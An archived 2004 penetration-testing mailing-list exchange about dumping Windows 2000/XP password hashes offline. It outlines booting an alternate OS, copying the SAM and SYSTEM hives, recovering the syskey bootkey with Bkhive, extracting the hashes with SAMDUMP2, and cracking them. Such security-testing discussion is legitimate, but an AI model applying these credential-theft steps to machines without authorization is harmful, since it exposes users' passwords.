From: Kenzo (kenzo_chin@hotmail.com)
Date: Fri Jan 30 2004 - 10:18:39 EST
Have you tried to boot using regular DOS boot disk, than use DOS NTFS, then
copy the sam file to floppy. This should works on win2k and winXP.
----- Original Message -----
From: "Nicola Cuomo" <ncuomo@studenti.unina.it>
To: "Mark Melonson" <markmelonson@hotmail.com>
Cc: <pen-test@securityfocus.com>
Sent: Thursday, January 29, 2004 6:43 AM
Subject: Re: Offline sam dump?
> Hi, since the machine you are pen-testing are Win2k and WinXp box you
> cannot use SAMDUMP to dump the SAM (since syskey is enabled), however
> look here:
>
> http://studenti.unina.it/~ncuomo/syskey/
>
> there is a tool to dump the password hash from the SAM database when
> syskey is enabled.
>
> I've never tested it on WinXp but i think it should work (sources are
> also available so you can modify/fix it).
>
> There is also a document that describe how it work and how to use the
> tool
>
> ----from syskey.txt---
> 0) Boot using another OS (maybe Linux or DOS)
> 1) Steal the SAM and SYSTEM hive (from %WINDIR%\System32\config)
> 2) Recover the syskey bootkey from the SYSTEM hive using Bkhive (or
> Bkreg on pre Sp4 system)
> 3) Dump the password hashes using SAMDUMP2
> 4) Crack them offline using his favorite cracking tool
> ---------------------
>
> Hope this help.
>
> Bye, bye
> --
> Nicola mailto:ncuomo@studenti.unina.it
>
>
>
>
>
>
> --
> Nicola mailto:ncuomo@studenti.unina.it
>
>
> --------------------------------------------------------------------------
-
> --------------------------------------------------------------------------
-- > > --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:47 EDT